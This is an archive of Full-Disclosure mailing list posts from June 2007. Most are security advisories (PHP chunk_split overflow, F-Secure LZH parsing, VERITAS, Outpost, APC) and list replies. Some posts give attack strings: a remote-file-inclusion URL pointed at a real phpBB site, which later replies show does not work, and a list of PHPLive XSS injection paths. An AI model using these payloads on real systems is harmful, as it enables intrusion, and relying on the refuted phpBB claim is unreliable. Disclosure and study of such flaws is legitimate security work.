From codeshepherd at gmail.com  Fri Jun  1 09:26:28 2007
From: codeshepherd at gmail.com (Dëêþàñ Çhäkrãvârthÿ)
Date: Fri, 01 Jun 2007 16:26:28 +0800
Subject: [Full-disclosure] Palimm Palimmm
In-Reply-To: <686adc11.290a7144.465efce4.b4ec1@o2.pl>
References: <173552787.20070531180730@Zoller.lu> <686adc11.290a7144.465efce4.b4ec1@o2.pl>
Message-ID: <465FD834.1050506@gmail.com>

mailing-lists wrote:
> I think I read this before... :)
>
> RMS
>
>
How do I read this message ?
>> --
>> http://secdev.zoller.lu
>> Thierry Zoller
>>

From research at sec-consult.com  Fri Jun  1 15:19:15 2007
From: research at sec-consult.com (Gerhard Wagner)
Date: Fri, 1 Jun 2007 16:19:15 +0200
Subject: [Full-disclosure] SEC Consult
 SA-20070601-0 :: PHP chunk_split() integer overflow
Message-ID: <46602AE3.4010303@sec-consult.com>

SEC Consult Security Advisory < 20070601-0 >
===========================================================================
              title: PHP chunk_split() integer overflow
            program: PHP
 vulnerable version: < 5.2.3
             impact: moderate
           homepage: http://www.php.net
              found: 2007-05-25
                 by: Gerhard Wagner / SEC Consult / www.sec-consult.com
     permanent link: http://www.sec-consult.com/291.html
===========================================================================

Vendor description:
---------------

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development ...

Vulnerability overview:
---------------

The parameters chunks, srclen and chunklen are used without any check in
a memory allocation statement. Due to a possible integer overflow this
can result in the allocation of a too small buffer which leads to a heap
overflow. This crashes the php process and may allow execution of
arbitrary code.

Vulnerability details:
---------------

In line 1963 the chunk_split function tries to allocate the adequate
size of memory for the result of the function. In case the values chunks
and endlen are bigger than 65534 an integer overflow is triggered and the
wrong size of memory is allocated, which results in a heap overflow.

ext/standard/string.c:

1953 static char *php_chunk_split(char *src, int srclen, char *end, int endlen, int chunklen, int *destlen)
1954 {
1955     char *dest;
1956     char *p, *q;
1957     int chunks; /* complete chunks! */
1958     int restlen;
1959
1960     chunks = srclen / chunklen;
1961     restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963     dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1), sizeof(char), 0);
1964
1965     for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966         memcpy(q, p, chunklen);
1967         q += chunklen;
1968         memcpy(q, end, endlen);
1969         q += endlen;
1970         p += chunklen;
1971     }

proof of concept:
---------------

vulnerable versions:
---------------

The version 5.2.3 fixes this security issue. All earlier releases should
be prone to the demonstrated vulnerability.

vendor status:
---------------
vendor notified: 2007-05-29
vendor response: 2007-05-29
patch available: 2007-06-01
coordinated disclosure: 2007-06-01

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Gerhard Wagner / @2007

From security at nruns.com  Fri Jun  1 17:37:10 2007
From: security at nruns.com (security at nruns.com)
Date: Fri, 1 Jun 2007 18:37:10 +0200
Subject: [Full-disclosure] n.runs-SA-2007.013 - F-Secure Antivirus LZH parsing BufferOverflow Advisory
Message-ID:

n.runs AG
http://www.nruns.com/                              security(at)nruns.com
n.runs-SA-2007.013                                           01-Jun-2007
________________________________________________________________________

Vendor:            F-Secure Corporation, http://www.f-secure.com
Affected Products: F-Secure Anti-Virus for Workstations version 5.44 and earlier
                   F-Secure Anti-Virus for Windows Servers version 5.52 and earlier
                   F-Secure Anti-Virus for Citrix Servers version 5.52
                   F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
                   F-Secure Anti-Virus Client Security version 6.03 and earlier
                   F-Secure Anti-Virus for MS Exchange version 6.40 and earlier
                   F-Secure Internet Gatekeeper version 6.60 and earlier
                   F-Secure Internet Security 2005, 2006 and 2007
                   F-Secure Anti-Virus 2005, 2006 and 2007
                   Solutions based on F-Secure Protection Service for Consumers version 6.40 and earlier
                   F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
                   F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier
                   F-Secure Anti-Virus Linux Client Security 5.30 and earlier
                   F-Secure Anti-Virus Linux Server Security 5.30 and earlier
                   F-Secure Internet Gatekeeper for Linux 2.16 and earlier
Vulnerability:     Buffer Overflow (remote)
Risk:              CRITICAL
________________________________________________________________________

Vendor communication:

2007/05/07 initial notification to F-Secure Corporation
2007/05/08 F-Secure Corporation Response
2007/05/08 PGP public keys exchange
2007/05/08 PoC files sent to F-Secure Corporation
2007/05/14 F-Secure Corporation acknowledged the PoC files
2007/05/18 F-Secure Corporation validate the Vulnerability
2007/05/18 F-Secure Corporation notify update release date
2007/05/30 F-Secure Corporation released Update with fixes
________________________________________________________________________

Overview:

F-Secure Corporation protects consumers and businesses against computer
viruses and other threats from the Internet and mobile networks.
F-Secure award-winning solutions are available for workstations,
gateways, servers and mobile phones. They include antivirus and desktop
firewall with intrusion prevention, antispam and antispyware solutions,
as well as network control solutions for Internet Service Providers.
F-Secure protection is also available as a service through major ISPs,
such as France Telecom, TeliaSonera, PCCW and Charter Communications.
F-Secure is the global market leader in mobile phone protection provided
through mobile operators, such as T-Mobile and Swisscom and mobile
handset manufacturers such as Nokia.

Description:

A remotely exploitable vulnerability has been found in the files parsing
engine.

In detail, the following flaw was determined:

- Buffer Overflow through Integer wrap around in .LZH files parsing

Impact:

This problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerability.
The vulnerability is present in F-Secure Corporation software products
above mentioned in all platforms supported by the affected products.

Solution:

The vulnerability was reported on 07.May.2007 and an update has been
issued on 30.May.2007 to solve this vulnerability. For detailed
information about the fixes follow the link in References [1] section of
this document.
________________________________________________________________________

Credit:
Bugs found by Sergio Alvarez of n.runs AG.
________________________________________________________________________

References:
http://www.f-secure.com/security/fsc-2007-1.shtml [1]

This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php
________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security at nruns.com for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall n.runs be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if n.runs has been advised of the possibility of
such damages.

Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
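
The allocation-size arithmetic from the chunk_split() advisory above, worked through as an added example (not code from PHP or from either advisory). The function names and sample values are assumptions chosen for illustration; the same pre-allocation check applies to the integer wrap-around class the LZH advisory names.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added illustration; all function names here are hypothetical, not PHP's. */

/* The expression from line 1963, srclen + (chunks + 1) * endlen + 1,
 * reduced modulo 2^32 the way a 32-bit int computation wraps on common
 * platforms. uint32_t is used so the wrap is well defined in C.
 * The expression is evaluated before the allocator is called, so any
 * overflow check inside the allocator only ever sees the wrapped value.
 * Caller must pass chunklen > 0. */
static uint32_t alloc_size_wrapped(int32_t srclen, int32_t endlen, int32_t chunklen)
{
    uint32_t chunks = (uint32_t)(srclen / chunklen);
    return (uint32_t)srclen + (chunks + 1u) * (uint32_t)endlen + 1u;
}

/* The same expression in 64-bit arithmetic, which cannot overflow for
 * non-negative 32-bit inputs: the size the result really needs. */
static uint64_t alloc_size_exact(int32_t srclen, int32_t endlen, int32_t chunklen)
{
    uint64_t chunks = (uint64_t)(srclen / chunklen);
    return (uint64_t)srclen + (chunks + 1u) * (uint64_t)endlen + 1u;
}

/* Bytes written by the copy loop at lines 1965-1971: one chunk plus one
 * 'end' string per complete chunk. */
static uint64_t loop_bytes_copied(int32_t srclen, int32_t endlen, int32_t chunklen)
{
    uint64_t chunks = (uint64_t)(srclen / chunklen);
    return chunks * ((uint64_t)chunklen + (uint64_t)endlen);
}

/* Hardened variant: validate the inputs, compute in 64 bits, and refuse
 * any request whose true size does not fit in a signed 32-bit int. */
static bool alloc_size_checked(int32_t srclen, int32_t endlen, int32_t chunklen,
                               size_t *out)
{
    if (srclen < 0 || endlen < 0 || chunklen <= 0)
        return false;

    uint64_t need = alloc_size_exact(srclen, endlen, chunklen);
    if (need > (uint64_t)INT32_MAX)
        return false;

    *out = (size_t)need;
    return true;
}

int main(void)
{
    /* Constructed sample values: chunks and endlen both exceed 65534. */
    const int32_t srclen = 65536, endlen = 65536, chunklen = 1;
    size_t n = 0;

    printf("wrapped allocation : %llu bytes\n",
           (unsigned long long)alloc_size_wrapped(srclen, endlen, chunklen));
    printf("exact requirement  : %llu bytes\n",
           (unsigned long long)alloc_size_exact(srclen, endlen, chunklen));
    printf("written by the loop: %llu bytes\n",
           (unsigned long long)loop_bytes_copied(srclen, endlen, chunklen));
    printf("checked variant    : %s\n",
           alloc_size_checked(srclen, endlen, chunklen, &n) ? "accepted" : "rejected");
    return 0;
}
```
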
From mc.iglo at googlemail.com  Fri Jun  1 12:45:32 2007
From: mc.iglo at googlemail.com (MC Iglo)
Date: Fri, 1 Jun 2007 13:45:32 +0200
Subject: [Full-disclosure] static XSS / SQL-Injection in Omegasoft Insel
Message-ID: <99e73caa0706010445q7d01e05bsbc1c58475ea88aa7@mail.gmail.com>

Input passed to fields in OmegaMw7's tables isn't properly sanitized
before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site and/or inject
SQL-Commands

This applies to many many standard fields in different tables e.g.
F05003, F05005, F05015 and to all user-created text fields using the
form creator (you cannot do it a different way)

kind regards
MC.Iglo

From dr.rezen at gmail.com  Fri Jun  1 18:05:01 2007
From: dr.rezen at gmail.com (dr.rezen at gmail.com)
Date: Fri, 01 Jun 2007 13:05:01 -0400
Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Message-ID:

New bug found in phpBB, most pages vulnerable, there's more bugs, I'll
post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!

From dr.rezen at gmail.com  Fri Jun  1 18:06:07 2007
From: dr.rezen at gmail.com (dr.rezen at gmail.com)
Date: Fri, 01 Jun 2007 13:06:07 -0400
Subject: [Full-disclosure] PHPLive ALL VERSION: RFI + XSS
Message-ID:

There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others)

/phplive/chat.php?sid=
/phplive/help.php?LANG[DEFAULT_BRANDING]=
/phplive/help.php?PHPLIVE_VERSION=
/phplive/admin/header.php?admin[name]=
/phplive/super/info.php?BASE_URL=

And if serveradmin left default setup install files:

/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=
/phplive/setup/footer.php?PHPLIVE_VERSION=
/phplive/setup/footer.php?nav_line=

Bug found by ReZEN! XORCREW! H4X H4X!
From openpkg-noreply at openpkg.com  Fri Jun  1 13:11:30 2007
From: openpkg-noreply at openpkg.com (OpenPKG GmbH)
Date: Fri, 1 Jun 2007 14:11:30 +0200
Subject: [Full-disclosure] [OpenPKG-SA-2007.020] OpenPKG Security Advisory (php)
Message-ID:

____________________________________________________________________________

Publisher Name:          OpenPKG GmbH
Publisher Home:          http://openpkg.com/

Advisory Id (public):    OpenPKG-SA-2007.020
Advisory Type:           OpenPKG Security Advisory (SA)
Advisory Directory:      http://openpkg.com/go/OpenPKG-SA
Advisory Document:       http://openpkg.com/go/OpenPKG-SA-2007.020
Advisory Published:      2007-06-01 14:10 UTC

Issue Id (internal):     OpenPKG-SI-20070601.01
Issue First Created:     2007-06-01
Issue Last Modified:     2007-06-01
Issue Revision:          02
____________________________________________________________________________

Subject Name:            php Security fixes
Subject Summary:         Security Fixes
Subject Home:            -
Subject Versions:        php5.* <= 5.2.3

Vulnerability Id:        CVE-2007-2872, CVE-2007-2756
Vulnerability Scope:     global (not OpenPKG specific)

Attack Feasibility:      run-time
Attack Vector:           remote network
Attack Impact:           denial of service, exposure of sensitive
                         information, arbitrary code execution

Description:
    According to a vendor release announcement [0] multiple security
    enhancements and fixes were included in version 5.2.3 of the
    programming language PHP [1]. Fixes that apply to the OpenPKG
    Enterprise 1 packages were extracted and backported.

    The readfile() function allows checking the existence of files
    anywhere in the filesystem, circumventing the open_basedir
    restriction. (http://bugs.php.net/bug.php?id=41492)

    Fixed possible infinite loop in imagecreatefrompng.
    (Xavier Roche) (CVE-2007-2756)

    Fixed an integer overflow inside chunk_split()
    (Gerhard Wagner) (CVE-2007-2872)

References:
    [0] http://www.php.net/releases/5_2_3.php
    [1] http://www.php.net/
____________________________________________________________________________

Primary Package Name:    php
Primary Package Home:    http://openpkg.org/go/package/php

Corrected Distribution:  Corrected Branch:  Corrected Package:
OpenPKG Enterprise       E1.0-SOLID         apache-1.3.37-E1.0.6
OpenPKG Enterprise       E1.0-SOLID         php-5.1.6-E1.0.4
OpenPKG Community        CURRENT            apache-1.3.37-20070601
OpenPKG Community        CURRENT            apache2-php-5.2.3-20070601
OpenPKG Community        CURRENT            php-5.2.3-20070601
____________________________________________________________________________

For security reasons, this document was digitally signed with the
OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34)
which you can download from http://openpkg.com/openpkg.com.pgp
or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/.
Follow the instructions at http://openpkg.com/security/signatures/
for more details on how to verify the integrity of this document.
____________________________________________________________________________

From skodliv at gmail.com  Fri Jun  1 15:43:27 2007
From: skodliv at gmail.com (poo)
Date: Fri, 1 Jun 2007 16:43:27 +0200
Subject: [Full-disclosure] Palimm Palimmm
In-Reply-To: <465FD834.1050506@gmail.com>
References: <173552787.20070531180730@Zoller.lu> <686adc11.290a7144.465efce4.b4ec1@o2.pl> <465FD834.1050506@gmail.com>
Message-ID:

knock your head into a wall 3 times and look in a mirror

On 6/1/07, Dëêþàñ Çhäkrãvârthÿ wrote:
>
> mailing-lists wrote:
> > I think I read this before... :)
> >
> > RMS
> >
> >
> How do I read this message ?
> >> --
> >> http://secdev.zoller.lu
> >> Thierry Zoller
> >>
>

--
smile tomorrow will be worse

From guinness.stout at gmail.com  Fri Jun  1 18:21:02 2007
From: guinness.stout at gmail.com (guiness.stout)
Date: Fri, 1 Jun 2007 13:21:02 -0400
Subject: [Full-disclosure] APC PowerChute Network Shutdown 2.21 is vulnerable to directory transversal
Message-ID: <7796947a0706011021s1f58dc5fjdfc9f35aa6d460ed@mail.gmail.com>

Synopsis: APC PowerChute Network Shutdown 2.21 is vulnerable to
directory traversal

Background: APC PowerChute Network Shutdown is used to perform graceful
shutdowns of network servers from one main server.

Affected Versions: <= 2.21 build 116

Description: APC PowerChute Network Shutdown is vulnerable to a
directory traversal by appending special characters such as %5c and %2e
to the end of a URL. This is due to an existing vulnerability in
Acme.Serve which is a Java HTTP server which PowerChute Network Shutdown
is built on.

Vendor Notified
April 9th 2007

Vendor Response
April 10th 2007 "A fix is being worked on for the next release."
April 25th 2007 Spoke to vendor again, no ETA.
May 3rd 2007 No ETA.
June 1st 2007 No ETA.

Reference:
CVE-2001-0748
http://xforce.iss.net/xforce/xfdb/6634
http://www.securityfocus.com/bid/2809
http://www.apc.com/products/family/index.cfm?id=127
http://www.acme.com/java/software/Acme.Serve.Serve.html

Chris Castaldo
"An ounce of prevention is worth a pound of cure."

From slythers at gmail.com  Fri Jun  1 19:38:56 2007
From: slythers at gmail.com (Slythers Bro)
Date: Fri, 1 Jun 2007 20:38:56 +0200
Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
In-Reply-To:
References:
Message-ID: <8f6a58a30706011138y44bdf2c9p7640f7f9db48a73d@mail.gmail.com>

I saw that in functions_post.php:

if (!defined('IN_PHPBB'))
{
    die('Hacking attempt');
}

so this RFI can't work

From kees at ubuntu.com  Fri Jun  1 22:47:37 2007
From: kees at ubuntu.com (Kees Cook)
Date: Fri, 1 Jun 2007 14:47:37 -0700
Subject: [Full-disclosure] [USN-468-1] Firefox vulnerabilities
Message-ID: <20070601214737.GT14736@outflux.net>

===========================================================
Ubuntu Security Notice USN-468-1              June 01, 2007
firefox vulnerabilities
CVE-2007-1362, CVE-2007-2867, CVE-2007-2868, CVE-2007-2869,
CVE-2007-2870, CVE-2007-2871
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox                 1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1

Ubuntu 6.10:
  firefox                 2.0.0.4+0dfsg-0ubuntu0.6.10

Ubuntu 7.04:
  firefox                 2.0.0.4+1-0ubuntu1

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Details follow:

Various flaws were discovered in the layout and JavaScript engines.
By tricking a user into opening a malicious web page, an attacker could
execute arbitrary code with the user's privileges.
(CVE-2007-2867, CVE-2007-2868)

A flaw was discovered in the form autocomplete feature. By tricking
a user into opening a malicious web page, an attacker could cause a
persistent denial of service. (CVE-2007-2869)

Nicolas Derouet discovered flaws in cookie handling. By tricking a user
into opening a malicious web page, an attacker could force the browser
to consume large quantities of disk or memory while processing long
cookie paths. (CVE-2007-1362)

A flaw was discovered in the same-origin policy handling of the
addEventListener JavaScript method. A malicious web site could exploit
this to modify the contents, or steal confidential data (such as
passwords), of other web pages. (CVE-2007-2870)

Chris Thomas discovered a flaw in XUL popups. A malicious web site
could exploit this to spoof or obscure portions of the browser UI, such
as the location bar. (CVE-2007-2871)

Updated packages for Ubuntu 6.06 LTS:
86122 b835b81677eb81107990de2d3cf359a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 61208 972228d0f8c6ad4018d07f9fdcfa83ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 9229254 1dc5977f11f4edee93acd533bf534a11 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 227922 96e979d0e88abbf9d686fb53d172007e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 162402 37027cb3034de814789448a4a21f411b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 253114 be9f781ec25930a782870fc6eb5aa538 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_i386.deb Size/MD5: 795090 750860731b186e1edfe65cb4de0658a8 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 52047388 f3546427d9db1135e45be79894343a49 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 3128766 e0eb209394a0e712ee5d1966dc7916bc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 90012 b94b9a09108120f270517da76ec6f389 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 62046 d36becc33de4045c2f2dbeb6c64289d1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 10300368 cc67e097f8e48deed1eaa440756015d8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 227928 8b80d9af30911ed28695a5588889b3f1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 
179146 8acfc78103e2564dae308249f1c13bf4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 253134 5430ca8ed9b673502ddd785839c958d2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_powerpc.deb Size/MD5: 880076 12176deddf234d06abeae6f70619beed sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 49581610 b95bd1d3ae9b24adbcb33cb178ebeedc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 3116042 13c8042824328d7532c1b6c001816cb4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 85894 501ad76450f235ff737b04aa4a338075 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 61276 f08660c4ab2e519dc20906b5f9e0262e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 9508164 8912a5edd8eb95f01de39d84d32bf008 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 227930 e7a4ea59029a82024b8a44b075c5c2ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 161202 48756164c8a0005e5f606d2c3f99f121 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 253134 bc7ad012e4520853ba30247887e3a73d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.4+1-0ubuntu1_sparc.deb Size/MD5: 785742 f7bce0cd084b04fe505701ec97d17303 -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070601/c954eec9/attachment.bin

From labs-no-reply at idefense.com Sat Jun 2 00:59:23 2007
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 01 Jun 2007 19:59:23 -0400
Subject: [Full-disclosure] iDefense Security Advisory 06.01.07: Symantec VERITAS Storage Foundation Administration Service DoS Vulnerability
Message-ID: <4660B2DB.2060503@idefense.com>

Symantec VERITAS Storage Foundation Administration Service DoS Vulnerability

iDefense Security Advisory 06.01.07
http://labs.idefense.com/intelligence/vulnerabilities/
June 01, 2007

I. BACKGROUND

The VERITAS Storage Foundation is made up of the Veritas File System, Veritas Volume Replicator (VVR) products and some other utilities. It allows virtualization of storage over a variety of platforms, and contains a remote administration application to configure and monitor the elements of the storage network. More information can be found at the following URL.

http://www.symantec.com/enterprise/products/overview.jsp?pcid=1020&pvid=203_1

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in VERITAS Software Corp.'s Storage Foundation 4.3 Enterprise Administration service could allow an unauthenticated attacker to consume excessive resources or crash the service.

The vulnerability specifically exists in the handling of packets delivered to the VVR Administration service port, TCP/8199. By sending specially crafted requests to a vulnerable host, attackers are able to control the size value for memory allocation. In cases where requests are made for more memory than the system is able to allocate, the service attempts to write to an invalid pointer, which crashes the service.

If allocation succeeds, the resulting memory will not be released until the connection is closed. This allows a resource consumption denial of service attack.

III. ANALYSIS

Successful exploitation of this vulnerability allows remote attackers to cause the affected service to terminate. As no checks are made that the values given make sense, it is possible to cause the service to allocate large amounts of memory, potentially causing severely degraded system performance and instability in other processes.

Crashing the administration service, which is restarted after 60 seconds, would most likely not directly impact the operation of the replication service itself. However, it is likely the resource consumption variation would prevent the affected system from being usable for the duration of the attack.

IV. DETECTION

iDefense Labs confirmed that VERITAS Storage Foundation for Windows version 4.3.01 is vulnerable. It is suspected that all previous versions of are vulnerable.

V. WORKAROUND

Applying filtering to the affected port, such that only hosts an administrator uses can access it, will help mitigate exposure to the vulnerability.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability with a software update. For more information consult their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2007.06.01a.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-1593 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

10/11/2006 Initial vendor notification
10/12/2006 Initial vendor response
06/01/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by CIRT.DK. Additionally, iDefense Labs discovered the ability to consume excessive resources while researching this vulnerability.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From hardened-php at hushmail.com Sat Jun 2 09:14:19 2007
From: hardened-php at hushmail.com (hardened-php at hushmail.com)
Date: Sat, 02 Jun 2007 04:14:19 -0400
Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Message-ID: <20070602081420.20350DA82A@mailserver8.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

"New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!"

Did you even read the code rezen? test your "vuln"? How about you test what you find instead of posting everything you see to the list and trying to get attention/fame? Leave vuln assessment/code auditing to people who actually care about it, and stop playing as one.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkZhJdIACgkQMe2+mPigEXJ5awP+Iqd9pRIypATEnM1K7ZhpAjxPgJeY
NedFd4Dkf6EgeQFy0zY2qGHM24CrbHO27bfsM2tRbUIdxUbGjD+f5pQ1hGjEF0Mg6Jw0
cBoER8jhWMiZZRxlseaKtkL7t8iF4DsZq5OIdrbHEm4oGpudHE0FKpJFyLsR8Tk85ziA
Icd6qcQ=
=Rhg/
-----END PGP SIGNATURE-----

From research at matousec.com Fri Jun 1 18:37:01 2007
From: research at matousec.com (Matousec - Transparent security Research)
Date: Fri, 01 Jun 2007 19:37:01 +0200
Subject: [Full-disclosure] Outpost Enforcing system reboot with 'outpost_ipc_hdr' mutex Vulnerability
Message-ID: <4660593D.3030400@matousec.com>

Hello,

We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0.

Description:

Outpost insufficiently protects its own mutex outpost_ipc_hdr. Arbitrary process is able to open and capture this mutex. In such case, Outpost is not able to use this mutex for its synchronization and its internal mechanisms lock when they try to use it. Outpost uses this mutex every time a potentially dangerous operation is executed. For example, this results in an impossibility of running new processes while the mutex is locked. After the mutex is released, all blocked operations complete. However, the release can not be enforced. User is thus forced to reboot the system.

Vulnerable software:

  * Outpost Firewall PRO 4.0 (1007.591.145)
  * Outpost Firewall PRO 4.0 (964.582.059)
  * probably all older versions of Outpost Firewall PRO 4.0
  * possibly older versions of Outpost Firewall PRO

More details and a proof of concept including its source code are available here:
http://www.matousec.com/info/advisories/Outpost-Enforcing-system-reboot-with-outpost_ipc_hdr-mutex.php

Regards,

--
Matousec - Transparent security Research
http://www.matousec.com/

From neothermic at phpbb.com Fri Jun 1 23:00:09 2007
From: neothermic at phpbb.com (Ashley Pinner)
Date: Fri, 01 Jun 2007 23:00:09 +0100
Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Message-ID: <466096E9.1000408@phpbb.com>

Renzen,

As has already been noted, functions_post.php has this at the top:

    if (!defined('IN_PHPBB'))
    {
        die('Hacking attempt');
    }

Accessing functions_post.php directly does not set this variable, ergo you will not be able to influence the includes below that line. This is the case with most of the files in the includes directory; any file that does not include the above lines does not have any code outside of just functions and thus you are unable to influence the variables as they would be out of scope.

If you feel that you have found a vulnerability, I would encourage you to use our Security tracker to make a report, which can be found here: http://www.phpbb.com/security/

Thank you,

NeoThermic
Support Team member, Incident Investigation Team leader, Audit Team member.

From bania.piotr at gmail.com Sun Jun 3 09:36:06 2007
From: bania.piotr at gmail.com (Piotr Bania)
Date: Sun, 03 Jun 2007 10:36:06 +0200
Subject: [Full-disclosure] Disinfectors for the calculator virus (ti89.Gaara)
Message-ID: <46627D76.607@gmail.com>

Hey,

For those who are interested, i made two types of Gaara (the calculator virus) disinfectors. The first one patches the virus body, which causes to return the control to the host just when the EPO injection travels the control to the virus.
So the virus will not get executed at all. And the second one is trying to find an EPO injection by searching for BRA opcodes, and testing them for suitable conditions.

Here are the codes:

Dis1:
